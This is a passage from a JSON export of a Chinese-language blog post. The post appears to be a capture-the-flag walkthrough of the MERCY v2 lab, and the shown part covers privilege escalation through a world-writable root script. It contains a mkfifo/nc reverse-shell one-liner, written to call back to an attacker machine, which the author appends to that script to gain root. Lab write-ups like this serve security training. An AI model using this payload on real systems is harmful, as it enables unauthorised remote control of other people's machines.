.secrets\n-rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock\nfluffy@MERCY:~\/.private\/secrets$ cat backup.save\ncat backup.save\n#!\/bin\/bash\n\necho Backing Up Files;\n\nfluffy@MERCY:~\/.private\/secrets$ cat .secret\ncat .secret\ncat: .secret: No such file or directory\nfluffy@MERCY:~\/.private\/secrets$ cat .secrets\ncat .secrets\nTry harder!\nfluffy@MERCY:~\/.private\/secrets$ cat timeclock\ncat timeclock\n#!\/bin\/bash\n\nnow=$(date)\necho &quot;The system time is: $now.&quot; &gt; ..\/..\/..\/..\/..\/var\/www\/html\/time\necho &quot;Time check courtesy of LINUX&quot; &gt;&gt; ..\/..\/..\/..\/..\/var\/www\/html\/time\nchown www-data:www-data ..\/..\/..\/..\/..\/var\/www\/html\/time<\/code><\/pre>\n<p>\u53d1\u73b0\u7a81\u7834\u53e3\u4e86\uff01\u867d\u7136\u8fd9\u51e0\u4e2a\u6587\u4ef6\u6ca1\u5565\u597d\u770b\u7684\uff0c\u4f46\u662f\u6700\u540e\u4e00\u4e2a\u6587\u4ef6\u53ef\u662froot\u6743\u9650\u7684\uff0c\u800c\u4e14\u6211\u4eec\u8fd8\u53ef\u4ee5\u8fdb\u884c\u7f16\u8f91\uff01\u5c1d\u8bd5\u53cd\u5f39\u4e00\u4e2ashell\u5230kali\uff01<\/p>\n<pre><code class=\"language-bash\">echo &quot;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.161.181.188 2345 &gt;\/tmp\/f&quot; &gt;&gt; timeclock<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401786.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401786.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325140037837\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\u62ff\u5230root\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>DIGITALWORLD.LOCAL: MERCY V2 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u626b\u63cf\u4e00\u4e0b\u7aef\u53e3\uff1a sudo nma [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-462","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/462","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=462"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/462\/revisions"}],"predecessor-version":[{"id":463,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/462\/revisions\/463"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=462"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=462"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=462"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}